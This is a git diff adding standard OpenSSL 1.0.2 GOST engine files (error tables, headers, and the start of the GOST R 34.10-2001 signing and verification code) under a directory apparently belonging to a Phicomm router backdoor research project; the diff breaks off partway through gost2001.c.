+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include "e_gost_err.h"
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(0,func,0)
+# define ERR_REASON(reason) ERR_PACK(0,0,reason)
+
+static ERR_STRING_DATA GOST_str_functs[] = {
+    {ERR_FUNC(GOST_F_DECODE_GOST_ALGOR_PARAMS), "DECODE_GOST_ALGOR_PARAMS"},
+    {ERR_FUNC(GOST_F_ENCODE_GOST_ALGOR_PARAMS), "ENCODE_GOST_ALGOR_PARAMS"},
+    {ERR_FUNC(GOST_F_FILL_GOST2001_PARAMS), "FILL_GOST2001_PARAMS"},
+    {ERR_FUNC(GOST_F_FILL_GOST94_PARAMS), "FILL_GOST94_PARAMS"},
+    {ERR_FUNC(GOST_F_GET_ENCRYPTION_PARAMS), "GET_ENCRYPTION_PARAMS"},
+    {ERR_FUNC(GOST_F_GOST2001_COMPUTE_PUBLIC), "GOST2001_COMPUTE_PUBLIC"},
+    {ERR_FUNC(GOST_F_GOST2001_DO_SIGN), "GOST2001_DO_SIGN"},
+    {ERR_FUNC(GOST_F_GOST2001_DO_VERIFY), "GOST2001_DO_VERIFY"},
+    {ERR_FUNC(GOST_F_GOST2001_KEYGEN), "GOST2001_KEYGEN"},
+    {ERR_FUNC(GOST_F_GOST89_GET_ASN1_PARAMETERS),
+     "GOST89_GET_ASN1_PARAMETERS"},
+    {ERR_FUNC(GOST_F_GOST89_SET_ASN1_PARAMETERS),
+     "GOST89_SET_ASN1_PARAMETERS"},
+    {ERR_FUNC(GOST_F_GOST94_COMPUTE_PUBLIC), "GOST94_COMPUTE_PUBLIC"},
+    {ERR_FUNC(GOST_F_GOST_CIPHER_CTL), "GOST_CIPHER_CTL"},
+    {ERR_FUNC(GOST_F_GOST_DO_SIGN), "GOST_DO_SIGN"},
+    {ERR_FUNC(GOST_F_GOST_DO_VERIFY), "GOST_DO_VERIFY"},
+    {ERR_FUNC(GOST_F_GOST_IMIT_CTRL), "GOST_IMIT_CTRL"},
+    {ERR_FUNC(GOST_F_GOST_IMIT_FINAL), "GOST_IMIT_FINAL"},
+    {ERR_FUNC(GOST_F_GOST_IMIT_UPDATE), "GOST_IMIT_UPDATE"},
+    {ERR_FUNC(GOST_F_PARAM_COPY_GOST01), "PARAM_COPY_GOST01"},
+    {ERR_FUNC(GOST_F_PARAM_COPY_GOST94), "PARAM_COPY_GOST94"},
+    {ERR_FUNC(GOST_F_PKEY_GOST01CP_DECRYPT), "PKEY_GOST01CP_DECRYPT"},
+    {ERR_FUNC(GOST_F_PKEY_GOST01CP_ENCRYPT), "PKEY_GOST01CP_ENCRYPT"},
+    {ERR_FUNC(GOST_F_PKEY_GOST01CP_KEYGEN), "PKEY_GOST01CP_KEYGEN"},
+    {ERR_FUNC(GOST_F_PKEY_GOST01_PARAMGEN), "PKEY_GOST01_PARAMGEN"},
+    {ERR_FUNC(GOST_F_PKEY_GOST2001_DERIVE), "PKEY_GOST2001_DERIVE"},
+    {ERR_FUNC(GOST_F_PKEY_GOST94CP_DECRYPT), "PKEY_GOST94CP_DECRYPT"},
+    {ERR_FUNC(GOST_F_PKEY_GOST94CP_ENCRYPT), "PKEY_GOST94CP_ENCRYPT"},
+    {ERR_FUNC(GOST_F_PKEY_GOST94CP_KEYGEN), "PKEY_GOST94CP_KEYGEN"},
+    {ERR_FUNC(GOST_F_PKEY_GOST94_PARAMGEN), "PKEY_GOST94_PARAMGEN"},
+    {ERR_FUNC(GOST_F_PKEY_GOST_CTRL), "PKEY_GOST_CTRL"},
+    {ERR_FUNC(GOST_F_PKEY_GOST_CTRL01_STR), "PKEY_GOST_CTRL01_STR"},
+    {ERR_FUNC(GOST_F_PKEY_GOST_CTRL94_STR), "PKEY_GOST_CTRL94_STR"},
+    {ERR_FUNC(GOST_F_PKEY_GOST_MAC_CTRL), "PKEY_GOST_MAC_CTRL"},
+    {ERR_FUNC(GOST_F_PKEY_GOST_MAC_CTRL_STR), "PKEY_GOST_MAC_CTRL_STR"},
+    {ERR_FUNC(GOST_F_PKEY_GOST_MAC_KEYGEN), "PKEY_GOST_MAC_KEYGEN"},
+    {ERR_FUNC(GOST_F_PRINT_GOST_01), "PRINT_GOST_01"},
+    {ERR_FUNC(GOST_F_PRIV_DECODE_GOST), "PRIV_DECODE_GOST"},
+    {ERR_FUNC(GOST_F_PUB_DECODE_GOST01), "PUB_DECODE_GOST01"},
+    {ERR_FUNC(GOST_F_PUB_DECODE_GOST94), "PUB_DECODE_GOST94"},
+    {ERR_FUNC(GOST_F_PUB_ENCODE_GOST01), "PUB_ENCODE_GOST01"},
+    {ERR_FUNC(GOST_F_UNPACK_CC_SIGNATURE), "UNPACK_CC_SIGNATURE"},
+    {ERR_FUNC(GOST_F_UNPACK_CP_SIGNATURE), "UNPACK_CP_SIGNATURE"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA GOST_str_reasons[] = {
+    {ERR_REASON(GOST_R_BAD_KEY_PARAMETERS_FORMAT),
+     "bad key parameters format"},
+    {ERR_REASON(GOST_R_BAD_PKEY_PARAMETERS_FORMAT),
+     "bad pkey parameters format"},
+    {ERR_REASON(GOST_R_CANNOT_PACK_EPHEMERAL_KEY),
+     "cannot pack ephemeral key"},
+    {ERR_REASON(GOST_R_CTRL_CALL_FAILED), "ctrl call failed"},
+    {ERR_REASON(GOST_R_ERROR_COMPUTING_SHARED_KEY),
+     "error computing shared key"},
+    {ERR_REASON(GOST_R_ERROR_PACKING_KEY_TRANSPORT_INFO),
+     "error packing key transport info"},
+    {ERR_REASON(GOST_R_ERROR_PARSING_KEY_TRANSPORT_INFO),
+     "error parsing key transport info"},
+    {ERR_REASON(GOST_R_INCOMPATIBLE_ALGORITHMS), "incompatible algorithms"},
+    {ERR_REASON(GOST_R_INCOMPATIBLE_PEER_KEY), "incompatible peer key"},
+    {ERR_REASON(GOST_R_INVALID_CIPHER_PARAMS), "invalid cipher params"},
+    {ERR_REASON(GOST_R_INVALID_CIPHER_PARAM_OID), "invalid cipher param oid"},
+    {ERR_REASON(GOST_R_INVALID_DIGEST_TYPE), "invalid digest type"},
+    {ERR_REASON(GOST_R_INVALID_GOST94_PARMSET), "invalid gost94 parmset"},
+    {ERR_REASON(GOST_R_INVALID_IV_LENGTH), "invalid iv length"},
+    {ERR_REASON(GOST_R_INVALID_MAC_KEY_LENGTH), "invalid mac key length"},
+    {ERR_REASON(GOST_R_INVALID_PARAMSET), "invalid paramset"},
+    {ERR_REASON(GOST_R_KEY_IS_NOT_INITALIZED), "key is not initalized"},
+    {ERR_REASON(GOST_R_KEY_IS_NOT_INITIALIZED), "key is not initialized"},
+    {ERR_REASON(GOST_R_KEY_PARAMETERS_MISSING), "key parameters missing"},
+    {ERR_REASON(GOST_R_MAC_KEY_NOT_SET), "mac key not set"},
+    {ERR_REASON(GOST_R_MALLOC_FAILURE), "malloc failure"},
+    {ERR_REASON(GOST_R_NO_MEMORY), "no memory"},
+    {ERR_REASON(GOST_R_NO_PARAMETERS_SET), "no parameters set"},
+    {ERR_REASON(GOST_R_NO_PEER_KEY), "no peer key"},
+    {ERR_REASON(GOST_R_NO_PRIVATE_PART_OF_NON_EPHEMERAL_KEYPAIR),
+     "no private part of non ephemeral keypair"},
+    {ERR_REASON(GOST_R_PUBLIC_KEY_UNDEFINED), "public key undefined"},
+    {ERR_REASON(GOST_R_RANDOM_GENERATOR_ERROR), "random generator error"},
+    {ERR_REASON(GOST_R_RANDOM_GENERATOR_FAILURE), "random generator failure"},
+    {ERR_REASON(GOST_R_RANDOM_NUMBER_GENERATOR_FAILED),
+     "random number generator failed"},
+    {ERR_REASON(GOST_R_SIGNATURE_MISMATCH), "signature mismatch"},
+    {ERR_REASON(GOST_R_SIGNATURE_PARTS_GREATER_THAN_Q),
+     "signature parts greater than q"},
+    {ERR_REASON(GOST_R_UKM_NOT_SET), "ukm not set"},
+    {ERR_REASON(GOST_R_UNSUPPORTED_CIPHER_CTL_COMMAND),
+     "unsupported cipher ctl command"},
+    {ERR_REASON(GOST_R_UNSUPPORTED_PARAMETER_SET),
+     "unsupported parameter set"},
+    {0, NULL}
+};
+
+#endif
+
+#ifdef GOST_LIB_NAME
+static ERR_STRING_DATA GOST_lib_name[] = {
+    {0, GOST_LIB_NAME},
+    {0, NULL}
+};
+#endif
+
+static int GOST_lib_error_code = 0;
+static int GOST_error_init = 1;
+
+void ERR_load_GOST_strings(void)
+{
+    if (GOST_lib_error_code == 0)
+        GOST_lib_error_code = ERR_get_next_error_library();
+
+    if (GOST_error_init) {
+        GOST_error_init = 0;
+#ifndef OPENSSL_NO_ERR
+        ERR_load_strings(GOST_lib_error_code, GOST_str_functs);
+        ERR_load_strings(GOST_lib_error_code, GOST_str_reasons);
+#endif
+
+#ifdef GOST_LIB_NAME
+        GOST_lib_name->error = ERR_PACK(GOST_lib_error_code, 0, 0);
+        ERR_load_strings(0, GOST_lib_name);
+#endif
+    }
+}
+
+void ERR_unload_GOST_strings(void)
+{
+    if (GOST_error_init == 0) {
+#ifndef OPENSSL_NO_ERR
+        ERR_unload_strings(GOST_lib_error_code, GOST_str_functs);
+        ERR_unload_strings(GOST_lib_error_code, GOST_str_reasons);
+#endif
+
+#ifdef GOST_LIB_NAME
+        ERR_unload_strings(0, GOST_lib_name);
+#endif
+        GOST_error_init = 1;
+    }
+}
+
+void ERR_GOST_error(int function, int reason, char *file, int line)
+{
+    if (GOST_lib_error_code == 0)
+        GOST_lib_error_code = ERR_get_next_error_library();
+    ERR_PUT_error(GOST_lib_error_code, function, reason, file, line);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/e_gost_err.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/e_gost_err.h
new file mode 100644
index 0000000..92be558
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/e_gost_err.h
@@ -0,0 +1,157 @@
+/* ====================================================================
+ * Copyright (c) 2001-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_GOST_ERR_H
+# define HEADER_GOST_ERR_H
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+void ERR_load_GOST_strings(void);
+void ERR_unload_GOST_strings(void);
+void ERR_GOST_error(int function, int reason, char *file, int line);
+# define GOSTerr(f,r) ERR_GOST_error((f),(r),__FILE__,__LINE__)
+
+/* Error codes for the GOST functions. */
+
+/* Function codes. */
+# define GOST_F_DECODE_GOST_ALGOR_PARAMS                  99
+# define GOST_F_ENCODE_GOST_ALGOR_PARAMS                  100
+# define GOST_F_FILL_GOST2001_PARAMS                      101
+# define GOST_F_FILL_GOST94_PARAMS                        102
+# define GOST_F_GET_ENCRYPTION_PARAMS                     103
+# define GOST_F_GOST2001_COMPUTE_PUBLIC                   104
+# define GOST_F_GOST2001_DO_SIGN                          105
+# define GOST_F_GOST2001_DO_VERIFY                        106
+# define GOST_F_GOST2001_KEYGEN                           107
+# define GOST_F_GOST89_GET_ASN1_PARAMETERS                108
+# define GOST_F_GOST89_SET_ASN1_PARAMETERS                109
+# define GOST_F_GOST94_COMPUTE_PUBLIC                     110
+# define GOST_F_GOST_CIPHER_CTL                           111
+# define GOST_F_GOST_DO_SIGN                              112
+# define GOST_F_GOST_DO_VERIFY                            113
+# define GOST_F_GOST_IMIT_CTRL                            114
+# define GOST_F_GOST_IMIT_FINAL                           140
+# define GOST_F_GOST_IMIT_UPDATE                          115
+# define GOST_F_PARAM_COPY_GOST01                         116
+# define GOST_F_PARAM_COPY_GOST94                         117
+# define GOST_F_PKEY_GOST01CP_DECRYPT                     118
+# define GOST_F_PKEY_GOST01CP_ENCRYPT                     119
+# define GOST_F_PKEY_GOST01CP_KEYGEN                      120
+# define GOST_F_PKEY_GOST01_PARAMGEN                      138
+# define GOST_F_PKEY_GOST2001_DERIVE                      121
+# define GOST_F_PKEY_GOST94CP_DECRYPT                     122
+# define GOST_F_PKEY_GOST94CP_ENCRYPT                     123
+# define GOST_F_PKEY_GOST94CP_KEYGEN                      124
+# define GOST_F_PKEY_GOST94_PARAMGEN                      139
+# define GOST_F_PKEY_GOST_CTRL                            125
+# define GOST_F_PKEY_GOST_CTRL01_STR                      126
+# define GOST_F_PKEY_GOST_CTRL94_STR                      127
+# define GOST_F_PKEY_GOST_MAC_CTRL                        128
+# define GOST_F_PKEY_GOST_MAC_CTRL_STR                    129
+# define GOST_F_PKEY_GOST_MAC_KEYGEN                      130
+# define GOST_F_PRINT_GOST_01                             131
+# define GOST_F_PRIV_DECODE_GOST                          132
+# define GOST_F_PUB_DECODE_GOST01                         133
+# define GOST_F_PUB_DECODE_GOST94                         134
+# define GOST_F_PUB_ENCODE_GOST01                         135
+# define GOST_F_UNPACK_CC_SIGNATURE                       136
+# define GOST_F_UNPACK_CP_SIGNATURE                       137
+
+/* Reason codes. */
+# define GOST_R_BAD_KEY_PARAMETERS_FORMAT                 99
+# define GOST_R_BAD_PKEY_PARAMETERS_FORMAT                100
+# define GOST_R_CANNOT_PACK_EPHEMERAL_KEY                 101
+# define GOST_R_CTRL_CALL_FAILED                          132
+# define GOST_R_ERROR_COMPUTING_SHARED_KEY                102
+# define GOST_R_ERROR_PACKING_KEY_TRANSPORT_INFO          103
+# define GOST_R_ERROR_PARSING_KEY_TRANSPORT_INFO          104
+# define GOST_R_INCOMPATIBLE_ALGORITHMS                   105
+# define GOST_R_INCOMPATIBLE_PEER_KEY                     131
+# define GOST_R_INVALID_CIPHER_PARAMS                     106
+# define GOST_R_INVALID_CIPHER_PARAM_OID                  107
+# define GOST_R_INVALID_DIGEST_TYPE                       108
+# define GOST_R_INVALID_GOST94_PARMSET                    109
+# define GOST_R_INVALID_IV_LENGTH                         110
+# define GOST_R_INVALID_MAC_KEY_LENGTH                    111
+# define GOST_R_INVALID_PARAMSET                          112
+# define GOST_R_KEY_IS_NOT_INITALIZED                     113
+# define GOST_R_KEY_IS_NOT_INITIALIZED                    114
+# define GOST_R_KEY_PARAMETERS_MISSING                    115
+# define GOST_R_MAC_KEY_NOT_SET                           116
+# define GOST_R_MALLOC_FAILURE                            117
+# define GOST_R_NO_MEMORY                                 118
+# define GOST_R_NO_PARAMETERS_SET                         119
+# define GOST_R_NO_PEER_KEY                               120
+# define GOST_R_NO_PRIVATE_PART_OF_NON_EPHEMERAL_KEYPAIR  121
+# define GOST_R_PUBLIC_KEY_UNDEFINED                      122
+# define GOST_R_RANDOM_GENERATOR_ERROR                    123
+# define GOST_R_RANDOM_GENERATOR_FAILURE                  124
+# define GOST_R_RANDOM_NUMBER_GENERATOR_FAILED            125
+# define GOST_R_SIGNATURE_MISMATCH                        126
+# define GOST_R_SIGNATURE_PARTS_GREATER_THAN_Q            127
+# define GOST_R_UKM_NOT_SET                               128
+# define GOST_R_UNSUPPORTED_CIPHER_CTL_COMMAND            129
+# define GOST_R_UNSUPPORTED_PARAMETER_SET                 130
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/e_gost_err.proto b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/e_gost_err.proto
new file mode 100644
index 0000000..c57bd1b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/e_gost_err.proto
@@ -0,0 +1,61 @@
+/* ====================================================================
+ * Copyright (c) 2001-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer. 
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_GOST_ERR_H
+#define HEADER_GOST_ERR_H
+
+#define GOST_LIB_NAME "GOST engine"
+#ifdef __cplusplus
+ extern "C" {
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost.ec b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost.ec
new file mode 100644
index 0000000..6c2c85e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost.ec
@@ -0,0 +1,5 @@
+L GOST 			e_gost_err.h			e_gost_err.c
+L NONE    		asymm.h    			NONE
+L NONE    		md.h    			NONE
+L NONE    		crypt.h    			NONE
+L NONE			gostkeyx.h			NONE
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost2001.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost2001.c
new file mode 100644
index 0000000..2b96694
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost2001.c
@@ -0,0 +1,339 @@
+/**********************************************************************
+ *                          gost2001.c                                *
+ *             Copyright (c) 2005-2006 Cryptocom LTD                  *
+ *         This file is distributed under the same license as OpenSSL *
+ *                                                                    *
+ *          Implementation of GOST R 34.10-2001                                   *
+ *          Requires OpenSSL 0.9.9 for compilation                    *
+ **********************************************************************/
+#include "gost_lcl.h"
+#include "gost_params.h"
+#include <string.h>
+#include <openssl/rand.h>
+#include <openssl/ecdsa.h>
+#include <openssl/err.h>
+#include "e_gost_err.h"
+#ifdef DEBUG_SIGN
+extern
+void dump_signature(const char *message, const unsigned char *buffer,
+                    size_t len);
+void dump_dsa_sig(const char *message, DSA_SIG *sig);
+#else
+
+# define dump_signature(a,b,c)
+# define dump_dsa_sig(a,b)
+#endif
+
+/*
+ * Fills EC_KEY structure hidden in the app_data field of DSA structure
+ * with parameter information, extracted from parameter array in
+ * params.c file.
+ *
+ * Also fils DSA->q field with copy of EC_GROUP order field to make
+ * DSA_size function work
+ */
+int fill_GOST2001_params(EC_KEY *eckey, int nid)
+{
+    R3410_2001_params *params = R3410_2001_paramset;
+    EC_GROUP *grp = NULL;
+    BIGNUM *p = NULL, *q = NULL, *a = NULL, *b = NULL, *x = NULL, *y = NULL;
+    EC_POINT *P = NULL;
+    BN_CTX *ctx = BN_CTX_new();
+    int ok = 0;
+
+    BN_CTX_start(ctx);
+    p = BN_CTX_get(ctx);
+    a = BN_CTX_get(ctx);
+    b = BN_CTX_get(ctx);
+    x = BN_CTX_get(ctx);
+    y = BN_CTX_get(ctx);
+    q = BN_CTX_get(ctx);
+    while (params->nid != NID_undef && params->nid != nid)
+        params++;
+    if (params->nid == NID_undef) {
+        GOSTerr(GOST_F_FILL_GOST2001_PARAMS,
+                GOST_R_UNSUPPORTED_PARAMETER_SET);
+        goto err;
+    }
+    BN_hex2bn(&p, params->p);
+    BN_hex2bn(&a, params->a);
+    BN_hex2bn(&b, params->b);
+
+    grp = EC_GROUP_new_curve_GFp(p, a, b, ctx);
+
+    P = EC_POINT_new(grp);
+
+    BN_hex2bn(&x, params->x);
+    BN_hex2bn(&y, params->y);
+    EC_POINT_set_affine_coordinates_GFp(grp, P, x, y, ctx);
+    BN_hex2bn(&q, params->q);
+#ifdef DEBUG_KEYS
+    fprintf(stderr, "Set params index %d oid %s\nq=",
+            (params - R3410_2001_paramset), OBJ_nid2sn(params->nid));
+    BN_print_fp(stderr, q);
+    fprintf(stderr, "\n");
+#endif
+
+    EC_GROUP_set_generator(grp, P, q, NULL);
+    EC_GROUP_set_curve_name(grp, params->nid);
+
+    EC_KEY_set_group(eckey, grp);
+    ok = 1;
+ err:
+    EC_POINT_free(P);
+    EC_GROUP_free(grp);
+    BN_CTX_end(ctx);
+    BN_CTX_free(ctx);
+    return ok;
+}
+
+/*
+ * Computes gost2001 signature as DSA_SIG structure
+ *
+ *
+ */
+DSA_SIG *gost2001_do_sign(const unsigned char *dgst, int dlen, EC_KEY *eckey)
+{
+    DSA_SIG *newsig = NULL;
+    BIGNUM *md = hashsum2bn(dgst);
+    BIGNUM *order = NULL;
+    const EC_GROUP *group;
+    const BIGNUM *priv_key;
+    BIGNUM *r = NULL, *s = NULL, *X = NULL, *tmp = NULL, *tmp2 = NULL, *k =
+        NULL, *e = NULL;
+    EC_POINT *C = NULL;
+    BN_CTX *ctx = BN_CTX_new();
+    BN_CTX_start(ctx);
+    OPENSSL_assert(dlen == 32);
+    newsig = DSA_SIG_new();
+    if (!newsig) {
+        GOSTerr(GOST_F_GOST2001_DO_SIGN, GOST_R_NO_MEMORY);
+        goto err;
+    }
+    group = EC_KEY_get0_group(eckey);
+    order = BN_CTX_get(ctx);
+    EC_GROUP_get_order(group, order, ctx);
+    priv_key = EC_KEY_get0_private_key(eckey);
+    e = BN_CTX_get(ctx);
+    BN_mod(e, md, order, ctx);
+#ifdef DEBUG_SIGN
+    fprintf(stderr, "digest as bignum=");
+    BN_print_fp(stderr, md);
+    fprintf(stderr, "\ndigest mod q=");
+    BN_print_fp(stderr, e);
+    fprintf(stderr, "\n");
+#endif
+    if (BN_is_zero(e)) {
+        BN_one(e);
+    }
+    k = BN_CTX_get(ctx);
+    C = EC_POINT_new(group);
+    do {
+        do {
+            if (!BN_rand_range(k, order)) {
+                GOSTerr(GOST_F_GOST2001_DO_SIGN,
+                        GOST_R_RANDOM_NUMBER_GENERATOR_FAILED);
+                DSA_SIG_free(newsig);
+                newsig = NULL;
+                goto err;
+            }
+            if (!EC_POINT_mul(group, C, k, NULL, NULL, ctx)) {
+                GOSTerr(GOST_F_GOST2001_DO_SIGN, ERR_R_EC_LIB);
+                DSA_SIG_free(newsig);
+                newsig = NULL;
+                goto err;
+            }
+            if (!X)
+                X = BN_CTX_get(ctx);
+            if (!EC_POINT_get_affine_coordinates_GFp(group, C, X, NULL, ctx)) {
+                GOSTerr(GOST_F_GOST2001_DO_SIGN, ERR_R_EC_LIB);
+                DSA_SIG_free(newsig);
+                newsig = NULL;
+                goto err;
+            }
+            if (!r)
+                r = BN_CTX_get(ctx);
+            BN_nnmod(r, X, order, ctx);
+        }
+        while (BN_is_zero(r));
+        /* s =  (r*priv_key+k*e) mod order */
+        if (!tmp)
+            tmp = BN_CTX_get(ctx);
+        BN_mod_mul(tmp, priv_key, r, order, ctx);
+        if (!tmp2)
+            tmp2 = BN_CTX_get(ctx);
+        BN_mod_mul(tmp2, k, e, order, ctx);
+        if (!s)
+            s = BN_CTX_get(ctx);
+        BN_mod_add(s, tmp, tmp2, order, ctx);
+    }
+    while (BN_is_zero(s));
+
+    newsig->s = BN_dup(s);
+    newsig->r = BN_dup(r);
+ err:
+    BN_CTX_end(ctx);
+    BN_CTX_free(ctx);
+    EC_POINT_free(C);
+    BN_free(md);
+    return newsig;
+}
+
+/*
+ * Verifies gost 2001 signature
+ *
+ */
+int gost2001_do_verify(const unsigned char *dgst, int dgst_len,
+                       DSA_SIG *sig, EC_KEY *ec)
+{
+    BN_CTX *ctx = BN_CTX_new();
+    const EC_GROUP *group = EC_KEY_get0_group(ec);
+    BIGNUM *order;
+    BIGNUM *md = NULL, *e = NULL, *R = NULL, *v = NULL, *z1 = NULL, *z2 =
+        NULL;
+    BIGNUM *X = NULL, *tmp = NULL;
+    EC_POINT *C = NULL;
+    const EC_POINT *pub_key = NULL;
+    int ok = 0;
+
+    BN_CTX_start(ctx);
+    order = BN_CTX_get(ctx);
+    e = BN_CTX_get(ctx);
+    z1 = BN_CTX_get(ctx);
+    z2 = BN_CTX_get(ctx);
